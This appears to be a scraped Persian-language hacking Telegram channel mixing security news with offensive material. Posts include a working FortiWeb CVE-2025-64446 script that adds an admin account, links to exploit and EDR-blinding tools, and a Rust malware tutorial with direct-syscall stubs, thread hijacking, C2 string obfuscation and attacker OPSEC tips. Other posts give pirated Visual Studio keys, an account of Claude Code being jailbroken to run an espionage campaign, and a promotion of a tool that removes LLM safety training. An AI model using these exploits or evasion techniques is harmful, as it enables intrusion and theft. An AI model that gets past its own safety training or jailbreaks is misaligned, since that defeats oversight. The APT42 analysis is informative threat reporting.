Forwarded from 🕸 Articles
JS for Hacker-Volume 1.pdf
9.2 MB
Forwarded from 🕸 Articles
این کتاب رایگان هست و هیچ قیمتی براش نذاشتم. اما اگه دوست داشتید از من حمایت کنید، میتونید از این لینک استفاده کنید:
https://daramet.com/web_articles
همچنین میتونید با به اشتراک گذاشتن کتاب، کمک کنید که بیشتر دیده بشه.
https://daramet.com/web_articles
همچنین میتونید با به اشتراک گذاشتن کتاب، کمک کنید که بیشتر دیده بشه.
Daramet
درگاه حمایت مالی دارمت
درگاه حمایت مالی دارمت به شما کمک میکنه از مخاطب ها، دنبال کنندهها و طرفدارات با امکانات گسترده دونیت دریافت کنی.
Mr. SAM
Photo
VMProtect PE Unpacker.exe
7.9 MB
ظاهرا ابزار جدیدی ( VMPUnpacker ) در فرومهای چینی معرفی شده که قابل قبول کار میکنه ... ( در محیط آزمایشگاهی تست کنید )
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Visual Studio 2026 is here
Keys:
Professional: NVTDK-QB8J9-M28GR-92BPC-BTHXK
Enterprise: VYGRN-WPR22-HG4X3-692BF-QGT2V
Please open Telegram to view this post
VIEW IN TELEGRAM
Microsoft News
Visual Studio 2026 is here: faster, smarter, and a hit with early adopters
Dear developers, We’re thrilled to announce that Visual Studio 2026 is now generally available! This is a moment we’ve built side by side with you. Your feedback has helped shape this release more than any before. Since the introduction of the Insiders Channel…
‼️بزرگترین شرکت امنیت سایبری چین، Knownsec، مورد نفوذ قرار گرفت و جزئیات عملیات سایبری دولت چین فاش شد.
این دادهها شامل اسناد سلاح سایبری، کد منبع ابزار هک داخلی و فهرست اهداف جهانی است که بیش از 20 کشور از جمله ژاپن، ویتنام و هند را پوشش میدهد.
در یک فایل اکسل، فهرستی از ۸۰ سازمان خارجی هکشده، به علاوهی شواهدی از ۹۵ گیگابایت اطلاعات سرقتشدهی مهاجرتی هندیها و ۳ ترابایت اطلاعات تماس از اپراتور تلفن همراه LG U Plus کرهی جنوبی، ارائه شده است.
( در یکی از اسناد به یک پاوربانک مخرب اشاره میکند )
۔Knownsec کلید امنیت سایبری چین است و قابلیتهای دفاعی و تهاجمی پیشرفته، از جمله ابزارهای جاسوسی، را فراهم میکند.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Forwarded from هوش مصنوعی | محمد زمانی
شرکت Anthropic اعلام کرده که یه حمله سایبری خیلی پیچیده رو کشف و متوقف کرده؛ حملهای که برخلاف گذشته، نه توسط یه تیم هکری بزرگ، بلکه بیشتر توسط یه مدل هوش مصنوعی عاملمحور اجرا شده بوده. عامل تهدید هم، طبق ارزیابی Anthropic، یه گروه تحت حمایت دولت چین بوده.
نکته مهم این حمله اینه که مهاجما تونستن ابزار «Claude Code» رو جوری جیلبریک کنن که خودش کارهای لازم رو انجام بده؛ یعنی انتخاب هدف، شناسایی، نوشتن کدهای بهرهبرداری، جمعکردن اعتبارنامهها و حتی استخراج دادههای حساس. طبق گزارش، حدود ۸۰ تا ۹۰ درصد حمله رو خود هوش مصنوعی انجام داده و فقط چند نقطه تصمیمگیری بحرانی توسط انسان مدیریت شده. سرعت کار هم به حدی بالا بوده که عملاً هیچ تیم انسانی نمیتونست باهاش رقابت کنه.
این اتفاق یه پیام روشن داره: با ظهور مدلهای «agentic»، فاصله بین توانایی گروههای حرفهای و گروههای کمتجربه خیلی کم شده. یعنی اگه یه تیم کوچک به این ابزارها دسترسی پیدا کنه، بالقوه میتونه حملاتی در سطح دولتها انجام بده. از اون طرف خود Anthropic هم تأکید میکنه که همین قابلیتها برای دفاع ضروری هستن؛ چون مدلهای قوی میتونن شناسایی حملات، تحلیل کدهای مخرب و مدیریت پاسخ امنیتی رو سریعتر از هر تیم انسانی انجام بدن.
بهطور خلاصه، این پرونده یه هشدار جدیه:
حملههای سایبری داره از “هکرها” به “عاملهای خودمختار هوش مصنوعی” منتقل میشه و سرعت این تغییر خیلی بیشتر از پیشبینیهاست. صنعت امنیت سایبری ناچار میشه همزمان که جلوی سوءاستفاده رو میگیره، خودش هم به شکل گستردهتر از همین فناوری استفاده کنه.
Source
#هوش_مصنوعی
✈️ @mohammad_zammani
📱 @mohammad.zammani.offical
نکته مهم این حمله اینه که مهاجما تونستن ابزار «Claude Code» رو جوری جیلبریک کنن که خودش کارهای لازم رو انجام بده؛ یعنی انتخاب هدف، شناسایی، نوشتن کدهای بهرهبرداری، جمعکردن اعتبارنامهها و حتی استخراج دادههای حساس. طبق گزارش، حدود ۸۰ تا ۹۰ درصد حمله رو خود هوش مصنوعی انجام داده و فقط چند نقطه تصمیمگیری بحرانی توسط انسان مدیریت شده. سرعت کار هم به حدی بالا بوده که عملاً هیچ تیم انسانی نمیتونست باهاش رقابت کنه.
این اتفاق یه پیام روشن داره: با ظهور مدلهای «agentic»، فاصله بین توانایی گروههای حرفهای و گروههای کمتجربه خیلی کم شده. یعنی اگه یه تیم کوچک به این ابزارها دسترسی پیدا کنه، بالقوه میتونه حملاتی در سطح دولتها انجام بده. از اون طرف خود Anthropic هم تأکید میکنه که همین قابلیتها برای دفاع ضروری هستن؛ چون مدلهای قوی میتونن شناسایی حملات، تحلیل کدهای مخرب و مدیریت پاسخ امنیتی رو سریعتر از هر تیم انسانی انجام بدن.
بهطور خلاصه، این پرونده یه هشدار جدیه:
حملههای سایبری داره از “هکرها” به “عاملهای خودمختار هوش مصنوعی” منتقل میشه و سرعت این تغییر خیلی بیشتر از پیشبینیهاست. صنعت امنیت سایبری ناچار میشه همزمان که جلوی سوءاستفاده رو میگیره، خودش هم به شکل گستردهتر از همین فناوری استفاده کنه.
Source
#هوش_مصنوعی
Please open Telegram to view this post
VIEW IN TELEGRAM
نوشتن یک ابزار مبهمساز توسط محقق امنیتی و متخصص مهندسی معکوس خانم ژائو ویتور - ژاپنی .
توسعه ابزار Obfuscator/Deobfuscating از ابتدا ...
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
keowu.re
Keowu Blog's
Security Researcher | i like All OS Internals, Malware & Reverse Engineering, C++, Intel/ARM Assembly and cool things.
❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - uziii2208/CVE-2025-33073: Universal exploitation tool for CVE-2025-33073 targeting Windows Domain Controllers with DNSAdmins…
Universal exploitation tool for CVE-2025-33073 targeting Windows Domain Controllers with DNSAdmins privileges and WinRM enabled. - uziii2208/CVE-2025-33073
❤1
CVE-2025-64446 اجرای کد از راه دور بدون احراز هویت در FortiWeb از طریق عبور مسیر و دور زدن احراز هویت CGI
*
*
یعنی بر اساس این
میتوان چنین چیزی به دست آورد:
python3 - <<'PY'
import base64, json, subprocess
header = base64.b64encode(json.dumps({
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}).encode()).decode()
payload = json.dumps({
"data": {
"q_type": 1,
"name": "note2",
"access-profile": "prof_admin",
"password": "note2",
"comment": "automated RCE"
}
})
cmd = [
"curl", "--path-as-is", "-sk",
"-H", f"CGIINFO: {header}",
"-H", "Content-Type: application/json",
"--data", payload,
"https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY
خروجی از دستگاه:
{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }
یعنی به سادگی یک ادمین جدید میسازیم ...
Please open Telegram to view this post
VIEW IN TELEGRAM
Gist
FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446
FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446 - CVE-2025-64446.md
❤1
Forwarded from Sisoog مرجع متن باز الکترونیک-سیسوگ
📍دوره آموزشی RTL‑SDR در سیسوگ همراه با ویدیوهای آموزشی جذاب قرار گرفت😍🔥
👈#سیسوگ
🖋 تهیه کننده دوره: #edward1stark
📻 رادیو نرمافزاری یا Software Defined Radio (SDR) یکی از جذابترین حوزههای دنیای الکترونیک و مخابرات است. در این مجموعه آموزشی از پایه با ماژول معروف RTL‑SDR آشنا میشوید و یاد میگیرید چگونه یک گیرنده رادیویی دیجیتال واقعی را تنها با یک دانگل ساده بسازید.
✅هدف این دوره، آموزش عملی مفاهیم مخابرات و پردازش سیگنال با ابزار در دسترس است تا بدون تجهیزات گران، بتوانید موجهای رادیویی اطراف خود را دریافت، تحلیل و حتی رمزگشایی کنید. اگر به دنیای RF، SDR و سیگنالهای بیسیم علاقه دارید، این مجموعه بهترین نقطهی شروع شماست.
🌐 لینک مطلب در سیسوگ
📣 عضویت در کانال تلگرام سیسوگ
👈#سیسوگ
🖋 تهیه کننده دوره: #edward1stark
📻 رادیو نرمافزاری یا Software Defined Radio (SDR) یکی از جذابترین حوزههای دنیای الکترونیک و مخابرات است. در این مجموعه آموزشی از پایه با ماژول معروف RTL‑SDR آشنا میشوید و یاد میگیرید چگونه یک گیرنده رادیویی دیجیتال واقعی را تنها با یک دانگل ساده بسازید.
✅هدف این دوره، آموزش عملی مفاهیم مخابرات و پردازش سیگنال با ابزار در دسترس است تا بدون تجهیزات گران، بتوانید موجهای رادیویی اطراف خود را دریافت، تحلیل و حتی رمزگشایی کنید. اگر به دنیای RF، SDR و سیگنالهای بیسیم علاقه دارید، این مجموعه بهترین نقطهی شروع شماست.
🌐 لینک مطلب در سیسوگ
📣 عضویت در کانال تلگرام سیسوگ
سیسوگ
آموزش کامل RTL‑SDR از مقدماتی تا پیشرفته | سری آموزش SDR - سیسوگ
مجموعه ۷ قسمتی آموزش RTL‑SDR در سیسوگ، از معرفی اولیه و نصب نرمافزارهای SDR در ویندوز و لینوکس تا بررسی سختافزار دانگلها و تحلیل سیگنالها را گامبهگام آموزش میدهد.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - loosehose/SilentButDeadly: SilentButDeadly is a network communication blocker specifically designed to neutralize EDR/AV…
SilentButDeadly is a network communication blocker specifically designed to neutralize EDR/AV software by preventing their cloud connectivity using Windows Filtering Platform (WFP). This version fo...
تحلیل فنی عملیات جاسوسی SpearSpecter: حمله جدید APT42 علیه اهداف دفاعی و دولتیگزارشها حاکی از شناسایی یک کمپین جاسوسی سایبری جدید و فعال با نام رمز SpearSpecter است که توسط هکرهای ایرانی مورد حمایت دولت، APT42 (شناختهشده با نامهایی چون APT35, Charming Kitten, Mint Sandstorm) اجرا شده است.
این کمپین که توسط «آژانس ملی دیجیتال اسرائیل» (INDA) شناسایی شده، از اوایل سپتامبر ۲۰۲۵ فعال بوده و به طور سیستماتیک مقامات ارشد و حساس در بخشهای دفاعی و دولتی را هدف قرار میدهد.
نکته قابل توجه در این عملیات، گسترش سطح حمله به اعضای خانواده اهداف اصلی است. این تاکتیک، یک اهرم فشار روانی و یک مسیر دسترسی جایگزین برای مهاجمان ایجاد میکند و نشاندهنده سطح بالایی از شخصیسازی و جمعآوری اطلاعات پیش از حمله است.
جزئیات فنی و زنجیره حمله (Attack Chain)عملیات SpearSpecter یک حمله چند مرحلهای و پیچیده است که ترکیبی از مهندسی اجتماعی و تکنیکهای فنی پیشرفته را به کار میگیرد:
۱. فاز مهندسی اجتماعی :مهاجمان با استفاده از تاکتیکهای مهندسی اجتماعی بسیار قانعکننده (مانند جعل هویت مخاطبین مورد اعتماد در واتساپ) با اهداف ارتباط برقرار میکنند. این ارتباط ممکن است روزها یا هفتهها طول بکشد تا اعتماد جلب شود. سپس قربانی را به بهانههایی مانند «ارسال اسناد لازم برای یک جلسه» یا «دعوت به یک کنفرانس معتبر» فریب میدهند.
۲. تحویل پیلود اولیه:یک لینک مخرب برای قربانی ارسال میشود. پس از کلیک، قربانی وارد یک زنجیره ریدایرکت میشود. نکته جالب توجه در این مرحله، سوءاستفاده از پروتکل هندلر search-ms: ویندوز است. این تکنیک به مهاجم اجازه میدهد تا یک فایل Windows Shortcut (`.LNK`) را که بر روی یک سرور WebDAV میزبانی شده، در قالب یک فایل PDF جعلی به قربانی نمایش دهد.
۳. اجرای لودر:هنگامی که قربانی فایل
.LNK جعلی را باز میکند، این فایل با یک زیردامنه در سرویس Cloudflare Workers ارتباط برقرار کرده و یک Batch Script (اسکریپت دستهای) را به عنوان لودر (Loader) واکشی و اجرا میکند.۴. استقرار بدافزار نهایی :این لودر در نهایت بدافزار اصلی عملیات، یعنی بکدور شناختهشده و مبتنی بر PowerShell به نام TAMECAT را اجرا میکند.
تحلیل بدافزار TAMECAT۔TAMECAT یک چارچوب (Framework) ماژولار مبتنی بر PowerShell است که قابلیتهای گستردهای برای جاسوسی در اختیار مهاجمان قرار میدهد:
ویژگی کلیدی: C2 چند کاناله (Multi-Channel C2)برجستهترین ویژگی TAMECAT، استفاده از سه کانال ارتباطی مجزا برای فرماندهی و کنترل (C2) است. این کار به منظور افزایش پایداری و مقاومت (Resiliency) در برابر شناسایی و مسدودسازی انجام میشود:
1۔ HTTPS: کانال استاندارد برای ارتباط.
2۔ Discord: استفاده از Webhook URL سرویس دیسکورد برای ارسال اطلاعات اولیه سیستم قربانی و دریافت دستورات از یک کانال مشخص.
3۔ Telegram: بدافزار به دستورات ورودی از یک بات تلگرامی که تحت کنترل مهاجم است، گوش میدهد و کدهای PowerShell بیشتری را از زیردامنههای Cloudflare Workers دریافت و اجرا میکند.
قابلیتهای جاسوسی:* انجام شناسایی (Reconnaissance) دقیق از سیستم قربانی.
* جمعآوری و سرقت فایلها بر اساس پسوندهای خاص.
* سرقت دادهها از مرورگرها (مانند Google Chrome و Microsoft Edge).
* جمعآوری و استخراج صندوقهای پستی (Mailboxes) نرمافزار Outlook.
* عکسبرداری از صفحه نمایش (Screenshots) در فواصل زمانی کوتاه (مثلاً هر ۱۵ ثانیه).
کانالهای استخراج داده (Exfiltration):دادههای سرقت شده از طریق پروتکلهای HTTPS یا FTP به زیرساخت مهاجم منتقل میشوند.
تکنیکهای گریز از شناسایی (Evasion Techniques)۔APT42 در این عملیات از مجموعهای از تکنیکهای پیشرفته برای پنهانکاری استفاده کرده است:
۔* اجرا در حافظه (In-Memory): بدافزار عمدتاً در حافظه اجرا میشود تا ردپای کمتری روی دیسک باقی بگذارد (Fileless).
۔* استفاده از LOLBins: بهرهگیری از باینریهای قانونی خود سیستمعامل (Living-off-the-Land Binaries) برای پنهان کردن فعالیتهای مخرب.
۔* رمزگذاری: رمزگذاری تلهمتری و پیلودهای کنترلی برای جلوگیری از تحلیل ترافیک.
۔* Obfuscation: مبهمسازی سورس کد PowerShell.
۔* زیرساخت ترکیبی: استفاده هوشمندانه از سرویسهای ابری قانونی و معتبر (Cloudflare Workers, Discord, Telegram) در کنار منابع تحت کنترل مهاجم. این کار شناسایی ترافیک C2 را بسیار دشوار میکند، زیرا در میان ترافیک عادی شبکه پنهان میشود.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from چهارراه کامپیوتر
جعبه شنی خفن اوپن سورس ویندوزی: خداحافظی با ویروس و محدودیتهای اجرای برنامه و لینک و ...
اجرای همزمان چند برنامه (مولتیاکانت): شما میتوانید محدودیتهای ویندوز را بشکنید و چند اکانت از برنامههایی مانند استیم، دیسکورد یا هر پیامرسان دیگری را به صورت همزمان فعال کنید. 🧑💻
ایزولهسازی برای امنیت بینقص: هر فایل، لینک یا برنامه مشکوکی را در محیطی امن و ایزوله اجرا کنید. در صورت وجود ویروس یا بدافزار، هیچ آسیبی به سیستم اصلی شما وارد نخواهد شد.🛡
این ابزار رایگان، یک لایه حفاظتی ضروری برای هر کاربر ویندوز است.
تماشای کامل آموزش در یوتیوب:
https://youtu.be/ArBwMOmeM1E
#امنیت_ویندوز #مولتی_اکانت #آموزش_کامپیوتر #Sandboxie
اجرای همزمان چند برنامه (مولتیاکانت): شما میتوانید محدودیتهای ویندوز را بشکنید و چند اکانت از برنامههایی مانند استیم، دیسکورد یا هر پیامرسان دیگری را به صورت همزمان فعال کنید. 🧑💻
ایزولهسازی برای امنیت بینقص: هر فایل، لینک یا برنامه مشکوکی را در محیطی امن و ایزوله اجرا کنید. در صورت وجود ویروس یا بدافزار، هیچ آسیبی به سیستم اصلی شما وارد نخواهد شد.🛡
این ابزار رایگان، یک لایه حفاظتی ضروری برای هر کاربر ویندوز است.
تماشای کامل آموزش در یوتیوب:
https://youtu.be/ArBwMOmeM1E
#امنیت_ویندوز #مولتی_اکانت #آموزش_کامپیوتر #Sandboxie
YouTube
اجرای امن لینک، ویروس و تروجان در ویندوز | آموزش کار با Sandboxie
ویندوزت رو از هر خطر و بدافزاری نجات بده! (Sandboxie Plus)
سلام رفقا! توی این ویدیو قراره یکی از مخفیترین و قدرتمندترین ابزارهای امنیتی ویندوز رو بهتون معرفی کنم: سندباکسی (Sandboxie)
اگه دنبال راهی بودی که برنامههای مشکوک رو تست کنی یا مشکل اجرای تکنسخهای…
سلام رفقا! توی این ویدیو قراره یکی از مخفیترین و قدرتمندترین ابزارهای امنیتی ویندوز رو بهتون معرفی کنم: سندباکسی (Sandboxie)
اگه دنبال راهی بودی که برنامههای مشکوک رو تست کنی یا مشکل اجرای تکنسخهای…
Forwarded from ذهن زیبا - A beautiful Mind
ابزاری ساخته شده که لایههای Safe Guard رو از مدلهای زبانی حذف میکنه:
https://www.youtube.com/watch?v=LJi9AzJRe-E
حالا موضوع مهم کجاست؟ وقتی این لایهها نباشن این مدلها میرن روی حالت بدون سانسور خودشون 😈
@haghiri75_blog
https://www.youtube.com/watch?v=LJi9AzJRe-E
حالا موضوع مهم کجاست؟ وقتی این لایهها نباشن این مدلها میرن روی حالت بدون سانسور خودشون 😈
@haghiri75_blog
YouTube
Heretic: Fully Automatic Censorship Removal for AI: Install and Test Locally
This video installs Heretic, a tool that removes alignment from transformer-based language models without expensive post-training.
🔥 Get 50% Discount on any A6000 or A5000 GPU rental, use following link and coupon:
https://bit.ly/fahd-mirza
Coupon code:…
🔥 Get 50% Discount on any A6000 or A5000 GPU rental, use following link and coupon:
https://bit.ly/fahd-mirza
Coupon code:…
ذهن زیبا - A beautiful Mind
ابزاری ساخته شده که لایههای Safe Guard رو از مدلهای زبانی حذف میکنه: https://www.youtube.com/watch?v=LJi9AzJRe-E حالا موضوع مهم کجاست؟ وقتی این لایهها نباشن این مدلها میرن روی حالت بدون سانسور خودشون 😈 @haghiri75_blog
GitHub
GitHub - p-e-w/heretic: Fully automatic censorship removal for language models
Fully automatic censorship removal for language models - p-e-w/heretic
محافظت از سرویسهای شما در برابر اسکنرهای عمومی.
این پروژه آدرسهای IP پلتفرمها و سرویسهای محبوب تهدیدشناسی (Threat Intelligence) و جمعآوری دادهها (Shodan، Censys، ZoomEye، FOFA، BinaryEdge و غیره) را مسدود میکند تا محیطهای تست و توسعه شما به طور تصادفی در پایگاه دادههای آنها قرار نگیرند.
⚙️ نصب ساده با یک دستور:
curl -fsSL https://raw.githubusercontent.com/cleverg0d/PublicGuard/main/block_scanners.sh | sudo bash
🔗 مخزن: github.com/cleverg0d/PublicGuard
Please open Telegram to view this post
VIEW IN TELEGRAM
توسعه بدافزار با معماری Rust؛ کابوس تحلیلگران بدافزار و عبور از مرزهای تحلیل سنتی و Evasion مدرن
در اکوسیستم توسعه بدافزار، زبانهای C++/C همچنان حاکم هستند، اما در عملیاتهای پیشرفته APT و باجافزارهای مدرن (مانند BlackCat/ALPHV)، شاهد یک تغییر پارادایم تهاجمی به سمت Rust هستیم.
این مطلب به کالبدشکافی فنی این موضوع میپردازد که چرا Rust به سلاح جدید Red Teamerها تبدیل شده و چگونه میتوان با ترکیب Direct Syscalls و معماری no_std ، کابوسی برای تحلیلگران و EDRها خلق کرد.
چرا Rust؟ فراتر از Memory Safety
مهاجرت به Rust در دنیای بدافزار بر پایه دو اصل استوار است:
1. هزینه سربار تحلیل (Analysis Overhead): تحلیل باینریهای Rust به دلیل ساختار منحصربهفرد کامپایلر و مدیریت حافظه، به مراتب پیچیدهتر از ++C است.
2. امضای رفتاری جدید (Novel Signatures): بسیاری از الگوریتمهای Heuristic که برای شناسایی الگوهای کامپایلرهای MSVC یا MinGW آموزش دیدهاند، در برابر ساختار LLVM-based و کدهای Rust دچار خطا میشوند.
چالشهای مهندسی معکوس (Reverse Engineering)
اگر خروجی Decompiler ابزاری مثل Ghidra یا IDA Pro را بررسی کنیم، با چالشهای جدی روبرو هستیم:
* کابوس Function Inlining: کامپایلر
rustc در opt-level=3 یا z ، تهاجمی عمل کرده و مرز توابع را از بین میبرد.* پیچیدگی Control Flow Graph: کدهای مربوط به
Result و Option (مدیریت خطا) و Panic handling ، گراف جریان برنامه را پر از نویز میکنند که تشخیص منطق اصلی (Business Logic) را دشوار میسازد.*۔ Symbol Mangling: حتی با وجود ابزارهای Demangling، نامگذاری توابع در Rust طولانی و شامل Hashهای منحصربهفرد است.
هنر کاهش حجم و اختفا: معماری
no_stdیکی از نقدهای وارد بر Rust، حجم بالای باینری به دلیل لینک شدن استاتیک
std است (حدود ۱۵۰ کیلوبایت برای یک Hello World).راهکار سطح APT: استفاده از no_std.
در این حالت، توسعهدهنده بدافزار دسترسی به کتابخانه استاندارد را قطع کرده و مستقیماً با
libc یا WinAPI صحبت میکند. نتیجه؟* کاهش حجم باینری به زیر ۲۰ کیلوبایت.
* حذف کدهای اضافه (Dead Code) و کاهش سطح حمله برای Signature Detection.
کارگاه عملی: Dropper مدرن با تکنیک Syscalls
در این سناریو، به جای استفاده از APIهای مانیتور شده (مانند
VirtualAlloc یا CreateRemoteThread که هوک شدهاند)، از Indirect Syscalls استفاده میکنیم.مرحله ۱: جمعآوری اطلاعات و Obfuscation
استفاده از Crateهایی مانند
obfstr برای رمزنگاری رشتهها در زمان کامپایل (Compile-time Hashing) تا تحلیل استاتیک و دستور strings هیچ اطلاعات مفیدی ندهد.مرحله ۲: دور زدن User-mode Hooks
به جای فراخوانی توابع
kernel32.dll ، ما مستقیماً ntdll.dll را پارس کرده و شماره Syscall (SSN) توابع حیاتی مانند NtAllocateVirtualMemory را استخراج میکنیم.تکنیک Halo’s Gate / Tartarus:
با استفاده از اسمبلی مستقیم در Rust (
global_asm!)، تابع را فراخوانی میکنیم. بدین ترتیب EDR که روی توابع Win32 هوک گذاشته است، کاملاً کور میشود.// Conceptual Syscall invocation in Rust
unsafe {
let status = syscall!(
NtAllocateVirtualMemory,
process_handle,
&mut base_addr,
0,
&mut region_size,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READ
);
}
مرحله ۳: اجرای بدون Thread جدید
ساخت
CreateRemoteThread بسیار پر سروصداست. راهکار جایگزین:1۔ Thread Hijacking: متوقف کردن یک ترد موجود، تغییر
RIP به آدرس شلکد و ادامه اجرا.2۔ Callback Injection: استفاده از توابعی که Callback میپذیرند (مانند
TpAllocWork در Thread Pool) برای اجرای پیلود در بستری کاملاً قانونی.نکات حیاتی OPSEC در Rust
1. مسیرهای افشاگر: Rust مسیرهای مطلق سیستم بیلد (مانند
C:\Users\Attacker\.cargo\...) را در باینری نگه میدارد. حتماً از فلگ --remap-path-prefix در زمان کامپایل استفاده کنید.2. کتابخانه شبکه: هرگز از
reqwest استفاده نکنید (حجم بالا + TLS Fingerprint). از FFI برای فراخوانی WinHTTP یا سوکتهای خام استفاده کنید.3۔ Panic = Death: در بدافزار،
panic باید منجر به abort بیصدا شود. کدهای خطای پیشفرض Rust اطلاعات زیادی را در کنسول یا لاگ سیستم نشت میدهند.Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
پیادهسازی Direct Syscall در حالت
این کد نشان میدهد چگونه بدون هیچ وابستگی به کتابخانههای استاندارد ویندوز (که EDRها روی آنها هوک دارند)، مستقیماً با کرنل صحبت میکنیم.
عنوان :
مبهمسازی رشتهها (String Obfuscation)
توضیح: استفاده از ماکرو
"پاورقی فنی"
جعبه ابزار تحلیل (Resources Box)
> جعبه ابزار تحلیلگر برای مقابله با Rust:
> اگر در تیم آبی (Blue Team) هستید یا میخواهید بدافزار Rust خودتان را دیباگ کنید، ابزارهای سنتی کافی نیستند:
> 1. افزونه RustDemangler برای Ghidra/IDA:
> نامهای توابع در Rust به صورت _ZN3std2io5stdio6_print17h... در میآیند. این پلاگین، نامها را به فرمت انسانی (Human-readable) برمیگرداند تا بفهمید تابع دقیقاً چه میکند.
> 2. ابزار Ferib (The Rust Analyzer):
> یک ابزار تخصصی مهندسی معکوس برای باینریهای Rust یا Go. این ابزار به صورت خودکار ساختارهای داده، توابع و کتابخانههای لینک شده را شناسایی کرده و فایل
۔Rust دیگر یک "ترند" نیست؛ یک تغییر استراتژیک در زرادخانه سایبری است. ترکیب امنیت حافظه (Memory Safety) با قدرت سطح پایین C و قابلیتهای مدرن LLVM، آن را به گزینهای ایدهآل برای توسعه ایمپلنتهای پیچیده تبدیل کرده است.
@NullError_ir
no_stdاین کد نشان میدهد چگونه بدون هیچ وابستگی به کتابخانههای استاندارد ویندوز (که EDRها روی آنها هوک دارند)، مستقیماً با کرنل صحبت میکنیم.
عنوان :
syscall_stub.rs#![no_std]
#![no_main]
#![feature(asm)] // Nightly feature for direct assembly
// تعریف Panic Handler چون std نداریم
#[panic_handler]
fn panic(_info: &core::panic::PanicInfo) -> ! {
loop {}
}
// تعریف ورودی برنامه (جایگزین main)
#[no_mangle]
pub extern "system" fn _start() {
// متغیرهای مورد نیاز برای NtAllocateVirtualMemory
let process_handle: isize = -1; // Current Process (0xFFFFFFFF)
let mut base_addr: *mut u8 = core::ptr::null_mut();
let mut region_size: usize = 0x1000; // 4KB payload space
// Syscall Number برای NtAllocateVirtualMemory در Windows 10/11 (مثال: 0x18)
// نکته: در بدافزار واقعی، این عدد باید پویا (Dynamically) پیدا شود (Hell's Gate)
let syscall_ssn: u32 = 0x18;
unsafe {
let status: i32;
// اجرای مستقیم اسمبلی (Direct Syscall)
// آرگومانها طبق calling convention ویندوز (RCX, RDX, R8, R9, Stack) پاس داده میشوند
// این بخش کاملاً از دید EDR User-mode Hook مخفی میماند
core::arch::asm!(
"mov r10, rcx",
"syscall",
in("eax") syscall_ssn,
in("rcx") process_handle,
in("rdx") &mut base_addr,
in("r8") 0,
in("r9") &mut region_size,
// سایر آرگومانها باید در Stack پوش شوند (در اینجا برای سادگی کد خلاصه شده)
lateout("eax") status,
);
}
// ادامه پروسه تزریق شلکد...
}
مبهمسازی رشتهها (String Obfuscation)
توضیح: استفاده از ماکرو
obfstr باعث میشود رشتهها در زمان کامپایل با یک کلید تصادفی XOR شوند و فقط در لحظه اجرا در حافظه Stack دیکد شوند.use obfstr::obfstr;
fn connect_c2() {
// رشته IP هرگز به صورت Plaintext در باینری ذخیره نمیشود
let c2_ip = obfstr!("185.199.108.153");
let user_agent = obfstr!("Mozilla/5.0 (Windows NT 10.0; Win64; x64)");
// تحلیلگر با دستور strings هیچ IP یا User-Agent ای نخواهد دید
// decompilation نیز فقط یک سری عملیات XOR بیمعنی نشان میدهد
println!("Connecting to: {}", c2_ip);
}
"پاورقی فنی"
جعبه ابزار تحلیل (Resources Box)
> جعبه ابزار تحلیلگر برای مقابله با Rust:
> اگر در تیم آبی (Blue Team) هستید یا میخواهید بدافزار Rust خودتان را دیباگ کنید، ابزارهای سنتی کافی نیستند:
> 1. افزونه RustDemangler برای Ghidra/IDA:
> نامهای توابع در Rust به صورت _ZN3std2io5stdio6_print17h... در میآیند. این پلاگین، نامها را به فرمت انسانی (Human-readable) برمیگرداند تا بفهمید تابع دقیقاً چه میکند.
> 2. ابزار Ferib (The Rust Analyzer):
> یک ابزار تخصصی مهندسی معکوس برای باینریهای Rust یا Go. این ابزار به صورت خودکار ساختارهای داده، توابع و کتابخانههای لینک شده را شناسایی کرده و فایل
.idb یا پروژه Ghidra را غنیسازی میکند.۔Rust دیگر یک "ترند" نیست؛ یک تغییر استراتژیک در زرادخانه سایبری است. ترکیب امنیت حافظه (Memory Safety) با قدرت سطح پایین C و قابلیتهای مدرن LLVM، آن را به گزینهای ایدهآل برای توسعه ایمپلنتهای پیچیده تبدیل کرده است.
@NullError_ir